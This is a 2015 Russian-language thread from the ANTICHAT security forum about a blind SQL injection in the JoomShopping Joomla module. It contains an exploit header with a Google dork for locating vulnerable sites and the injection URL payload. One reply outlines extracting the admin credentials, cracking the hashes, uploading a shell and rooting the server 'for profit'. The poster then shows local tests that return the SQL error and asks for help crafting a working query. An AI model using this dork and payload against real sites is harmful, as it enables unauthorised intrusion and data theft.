ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

30.11.2015, 16:19
|
|
Guest
Сообщений: n/a
Провел на форуме: 104689
Репутация:
1
|
|
[SIZE="4"][B]Вопрос по vBulletin 4.0.x
|
|
|
|

30.11.2015, 17:27
|
|
Guest
Сообщений: n/a
Провел на форуме: 179197
Репутация:
25
|
|
Сообщение от Sensoft
Sensoft said:
↑
Когда отсылаю POST запрос страница не перезагружается, почему ?
Вероятно у вас firefox версией выше 30, live http headers с версиями выше 30 не работает
|
|
|
|

30.11.2015, 17:44
|
|
Guest
Сообщений: n/a
Провел на форуме: 104689
Репутация:
1
|
|
Сообщение от Br@!ns
Br@!ns said:
↑
Вероятно у вас firefox версией выше 30, live http headers с версиями выше 30 не работает
Спасибо чувак помог
|
|
|
|

02.12.2015, 15:05
|
|
Guest
Сообщений: n/a
Провел на форуме: 7285
Репутация:
0
|
|
[QUOTE="Sensoft"]
Sensoft said:
↑
[SIZE="4"][B]Вопрос по vBulletin 4.0.x
|
|
|
|

04.12.2015, 17:40
|
|
Guest
Сообщений: n/a
Провел на форуме: 1817
Репутация:
0
|
|
JoomShopping - Blind SQL Injection
# Exploit Title: [JoomShopping Blind Sql injection]
# Google Dork: [allinurl:"/modules/mod_jshopping_products_wfl/js/"]
# Date: [2015-07-24]
# Exploit Author: [Mormoroth]
# Vendor Homepage: [http://www.webdesigner-profi.de]
# Software Link: [http://www.webdesigner-profi.de/joom...ownloads.html]
# Version: [All]
# Tested on: [Linux]
----------------------------
site/modules/mod_jshopping_products_wfl/js/settings.php?id=209 and 1=2-- a
Кто-нибудь пробовал применять? Можно что-то из этого извлечь?
|
|
|
|

04.12.2015, 21:42
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме: 371875
Репутация:
137
|
|
Сообщение от xaj3uie
xaj3uie said:
↑
Кто-нибудь пробовал применять? Можно что-то из этого извлечь?
Из этого можно извлечь логин:пасс админский, разхешить, зайти в админку и залиться, порутать сервак, а потом извлекать пользу....
|
|
|

04.12.2015, 21:57
|
|
Guest
Сообщений: n/a
Провел на форуме: 104689
Репутация:
1
|
|
Сообщение от winstrool
winstrool said:
↑
Из этого можно извлечь логин:пасс админский, разхешить, зайти в админку и залиться, порутать сервак, а потом извлекать пользу....
# Software Link: [http://www.webdesigner-profi.de/joom...ownloads.html]
Где взять а то не робит ссылка
|
|
|
|

04.12.2015, 23:38
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
у вас там уже все есть. или вам плагин нужен?
|
|
|

04.12.2015, 23:39
|
|
Guest
Сообщений: n/a
Провел на форуме: 104689
Репутация:
1
|
|
Сообщение от yarbabin
yarbabin said:
↑
у вас там уже все есть. или вам плагин нужен?
Плагин
|
|
|
|

05.12.2015, 12:52
|
|
Guest
Сообщений: n/a
Провел на форуме: 1817
Репутация:
0
|
|
Сообщение от winstrool
winstrool said:
↑
Из этого можно извлечь логин:пасс админский, разхешить, зайти в админку и залиться, порутать сервак, а потом извлекать пользу....
Либо я не до конца понимаю, либо у меня версии не сходятся.
Установил на локалку 3.4 версию движка и скачал с официального сайта этот джумлашопинг.
Вставляю так:
test.ru/modules/mod_jshopping_products_wfl/js/settings.php?id=209 and 1=2-- a
.SpoilerTarget" type="button">Spoiler: Открыть
Получаю сообщение:
if(typeof(jQuery) != 'undefined') {jQuery.noConflict();}window.addEvent('load',funct ion(){wflSliders['wfls209 and 1=2-- a'] = new wflSlider({"ribbon_behavior":null,"duration":500," effect_block":"single","id":"209 and 1=2-- a","orientation":"hor"})});
Вставляю вот так:
.SpoilerTarget" type="button">Spoiler: Ещё посмотреть
test.ru/modules/mod_jshopping_products_wfl/js/settings.php?id=209 and 1=2-- a'
Получаю:
Error displaying the error page: Application Instantiation Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''209 and 1=2-- a''' at line 3 SQL=SELECT params FROM bigmb_modules WHERE id='209 and 1=2-- a''
Получается, уязвимость присутствует и нужно лишь правильно составить запрос?
Направьте в нужное русло пожалуйста.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|